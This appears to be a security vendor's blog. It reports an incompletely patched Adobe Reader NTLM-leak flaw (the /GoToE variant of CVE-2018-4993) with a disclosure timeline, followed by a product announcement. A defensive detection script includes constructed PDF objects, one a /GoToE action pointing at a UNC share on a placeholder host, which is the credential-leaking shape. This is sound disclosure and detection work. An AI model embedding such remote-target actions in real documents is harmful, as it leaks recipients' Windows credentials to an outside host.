Tuesday, November 13, 2018

The case of the unpatched variant of the PDF NTLM leaking vulnerability CVE-2018-4993

In April or May 2018, Check Point released a blog post detailing an NTLM leaking vulnerability in Adobe Reader and Foxit Reader. Later, Adobe released a security advisory stating that the vulnerability was fixed as of Acrobat Reader DC 2018.011.20040. However, we found that only one variant of this vulnerability was successfully patched by Adobe; the other variant was not actually addressed.

The story
Recently, while testing our EdgeLogic engine (the backend engine of our free exploit detection service edgespot.io), we found at least two samples that produced interesting detection results.

When we put these two samples into our engine, they were detected as "MALICIOUS - POTENTIAL ZERO-DAY ATTACK (NTLM leaking)". They look like the following:

[Update on Nov. 14]
Users of edgespot.io will find that, starting today, the Detection Details of this particular threat have been changed to "exploit CVE-2018-15979 (NTLM leaking), previously zero-day (modified on 20181114)". This is because today we modified the description of the threat to reflect that a patch is available and a CVE ID has been assigned to it.

Could it be a false detection? Of course it could. Given that attack techniques are always evolving, exploit detection is not an easy task.

In order to confirm this test result, we fired up our VM, updated it to the latest Adobe Reader version, and tested the two samples manually. We observed that both samples still caused NTLM traffic to leave the machine.

After further research, we confirmed that the two samples actually exploit the same or a similar vulnerability to CVE-2018-4993, which was discussed in the Check Point blog post mentioned earlier. The Check Point blog states:
/S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
When we examined the content of the two samples, we found that the key parts of the two PDFs are as follows:

They both use the "/GoToE" keyword to trigger the NTLM leak. We later confirmed that while the "/GoToR" method was patched by Adobe, the "/GoToE" method was not.

We conclude that this is an incomplete patch for CVE-2018-4993 rather than a new vulnerability, because the Check Point blog mentioned this variant when disclosing CVE-2018-4993. Please note that we do not know whether both variants ("/GoToR" and "/GoToE") were reported to Adobe by Check Point, but clearly one variant was not fixed.
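The detection logic a defender wants here is a static check for exactly the shape the Check Point excerpt describes: an action whose /S is GoToR or GoToE and whose /F file specification points outside the document, because a UNC target is what makes the reader authenticate to a remote host. The following Python script is an added example written for this post; it is not EdgeSpot's EdgeLogic code and not taken from the Check Point write-up. It treats both action types identically (a scanner that only knew GoToR would have missed the variant discussed above), decodes literal and hex PDF strings as well as file-specification dictionaries, and flags UNC and URL targets. The embedded sample objects are constructed fragments, the host name remote.example is a placeholder, and the script assumes the objects are not hidden inside compressed object streams.

```python
"""Static triage check for PDF remote-destination actions (GoToR / GoToE).

Constructed example for this post; not EdgeSpot's EdgeLogic code.  The NTLM
leak behind CVE-2018-4993 (and the /GoToE variant the post reports as not
patched) needs an action whose /F file specification points outside the
document: a UNC target makes the reader authenticate to that host when the
action fires.  This scanner flags such actions for quarantine or review.
Assumption: input is uncompressed PDF object syntax (objects stored inside
compressed object streams must be inflated first).
"""
import re

# Action types that jump to a destination in another file, per the Check Point
# excerpt quoted in the post.  Case-insensitive so "/GotoE" is caught too.
REMOTE_ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE)\b", re.IGNORECASE)
CANONICAL = {b"gotor": "GoToR", b"gotoe": "GoToE"}
OBJECT_RE = re.compile(rb"\d+\s+\d+\s+obj\b(.*?)\bendobj", re.DOTALL)
# /F given as a file specification dictionary, e.g. << /FS /URL /F (...) >>
FILESPEC_DICT_RE = re.compile(rb"/F\s*<<(.*?)>>", re.DOTALL)
# A PDF string: literal (...) with backslash escapes, or hex <...>
STRING_RE = rb"(?:\((?P<lit>(?:\\.|[^\\)])*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>)"
FILE_KEY_RE = re.compile(rb"/(?:F|UNC|DOS|Unix|Mac)\s*" + STRING_RE, re.DOTALL)
URL_FS_RE = re.compile(rb"/FS\s*/URL")


def decode_string(m) -> str:
    """Decode a matched PDF string into text (octal escapes are not handled)."""
    if m.group("hex") is not None:
        h = re.sub(rb"\s", b"", m.group("hex"))
        h += b"0" * (len(h) % 2)          # PDF pads an odd trailing digit with 0
        return bytes.fromhex(h.decode("ascii")).decode("latin-1")
    raw, out, i = m.group("lit"), [], 0
    while i < len(raw):
        if raw[i:i + 1] == b"\\" and i + 1 < len(raw):
            nxt = raw[i + 1:i + 2]
            out.append({b"n": b"\n", b"r": b"\r", b"t": b"\t"}.get(nxt, nxt))
            i += 2
        else:
            out.append(raw[i:i + 1])
            i += 1
    return b"".join(out).decode("latin-1")


def classify_target(target: str):
    """Return 'unc', 'url' or None for a decoded file specification string."""
    t = target.strip()
    # "\\server\share" is the Windows form; a leading "//" is the platform-
    # independent way PDF file specifications write a network path.
    if t.startswith("\\\\") or t.startswith("//"):
        return "unc"
    if re.match(r"^[A-Za-z][A-Za-z0-9+.-]*://", t):
        return "url"
    return None


def extract_actions(pdf_bytes: bytes) -> list:
    """Every GoToR/GoToE action (first one per object) with its decoded target."""
    bodies = [m.group(1) for m in OBJECT_RE.finditer(pdf_bytes)] or [pdf_bytes]
    findings = []
    for body in bodies:
        act = REMOTE_ACTION_RE.search(body)
        if not act:
            continue
        target = kind = None
        spec = FILESPEC_DICT_RE.search(body)
        scope = spec.group(1) if spec else body
        s = FILE_KEY_RE.search(scope)
        if s:
            target = decode_string(s)
            kind = classify_target(target)
            if spec and URL_FS_RE.search(scope):
                kind = "url"
        findings.append({"action": CANONICAL[act.group(1).lower()],
                         "target": target, "kind": kind})
    return findings


def find_remote_actions(pdf_bytes: bytes) -> list:
    """Only actions whose target leaves the document: the NTLM-leak shape."""
    return [f for f in extract_actions(pdf_bytes) if f["kind"] is not None]


# Constructed test input: PDF object fragments, not a complete file.  Objects
# 3 and 5 carry remote destinations (placeholder host remote.example); 7 is a
# GoToR into a local sibling file and 9 a plain in-document GoTo, for contrast.
SAMPLE_OBJECTS = b"\n".join([
    rb"3 0 obj << /Type /Action /S /GoToE /F (\\\\remote.example\\share\\blank.pdf) /D [0 /Fit] >> endobj",
    rb"5 0 obj << /S /GoToR /F << /FS /URL /F (http://remote.example/blank.pdf) >> /D [0 /Fit] >> endobj",
    rb"7 0 obj << /S /GoToR /F (chapter2.pdf) /D [0 /Fit] >> endobj",
    rb"9 0 obj << /S /GoTo /D [3 0 R /Fit] >> endobj",
])

if __name__ == "__main__":
    for f in find_remote_actions(SAMPLE_OBJECTS):
        print(f"SUSPECT {f['action']} -> {f['kind']}: {f['target']}")
```

Run it against a PDF whose object streams have been expanded first (for example with qpdf --qdf --object-streams=disable), since the regexes only see uncompressed object syntax. The remote check on /F is the discriminating signal: GoToE has a legitimate use for files embedded in the document, so alerting on the action name alone would be noisy, while a GoToE or GoToR whose target is a UNC path or URL is what a reader would have to authenticate or connect to on open. The script is a triage aid, not a replacement for patching: an unpatched reader is still the root cause, and blocking outbound SMB at the network edge limits what any such document can leak.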

Nevertheless, from the standpoint of protecting users, this is a big deal for the following reasons:
  1. This is a zero-day (unpatched) exploit.
  2. The details of the zero-day exploit have been public for more than 5 months.
  3. Regarding the two samples on VirusTotal (VT) (there are likely more, although we found these two by chance), we do not know why they were submitted to VT or who submitted them; it is possible that bad guys realized this variant was not patched and were testing their zero-day exploits.

We realized this was an important finding, so we reported it to Adobe as fast as we could despite our busy agenda developing the system and website for edgespot.io. We are happy that they took up the issue quickly and patched it fast. Here is the disclosure timeline:

2018.11.04 finding reported to Adobe
2018.11.05 Adobe confirmed the finding and notified us that they planned to release a patch on Nov. 13
2018.11.13 patch released and blog post published

We ask users to patch their Adobe Reader as soon as possible; please follow Adobe's security advisory released today.

This finding proves the power of the EdgeLogic engine behind https://edgespot.io: it has an outstanding capability for identifying unknown and zero-day exploits! By offering it as a free service to everyone, we hope to make the internet a safer place. So, when you encounter a suspicious sample, whether it is an email (eml, msg), an Office file (doc, xls, ppt), a PDF, or even a .zip, try edgespot.io and see what it detects!

[Update on Nov. 14]
We have detected yet another sample exploiting this zero-day.

Unlike the previous two, which used internal IP addresses, this one used an external IP address, which looks more like a real in-the-wild attack. We're sharing this information to help the security community with threat intelligence.

Sunday, November 4, 2018

Announcing edgespot.io - a free exploit detection service with cutting-edge techniques!

Today, we're excited to announce the general availability (BETA) of edgespot.io - a free exploit detection service with cutting-edge techniques!

Today's cyber attacks, especially the advanced ones, usually start with an exploit. For instance, "embedded" malware may run as soon as the user opens an email attachment. Attackers may exploit patched vulnerabilities, since the fact is that not all users patch their software in time. Furthermore, they may exploit zero-day vulnerabilities, leaving the victim with nowhere to go.

Edgespot.io is specifically built to fight those advanced threats. It works much like the well-known virustotal.com: you upload a file and it tells you whether the file is malicious. However, there are huge differences.
  1. edgespot.io does NOT rely on or use any other malware or exploit detection engine; it is powered by our own (independent) EdgeLogic exploit analysis engine.
  2. edgespot.io does NOT accept "executable" samples (e.g. .exe/.dll); instead, it is developed (for now) to detect client-side exploit samples. The most popular sample types we currently handle are Microsoft Office files (Word, Excel, PowerPoint), PDFs, emails, etc.
After a file is submitted to edgespot.io, it is analyzed by our EdgeLogic system, an innovative exploit analysis system invented and built by us. The system is powered by various cutting-edge technologies such as machine learning and dynamic and static sample analysis, but most importantly, it is built with an exploit researcher's mindset.

The following screenshot shows a sample detected as a CVE-2017-11882 exploit.

Please note that, compared to other malware detection services and products, the advantage of edgespot.io is its outstanding capability for detecting unknown or even zero-day exploits! Based on our in-lab tests, the results are very promising.

We hope you love the service; for more details, please read our About page here. You may give it a try right now. :)

Please do not hesitate to reach us via email (contact@edgespot.io), our contact page, or Twitter; you're always welcome. Let's work together and make the internet a safer place.

The EdgeSpot team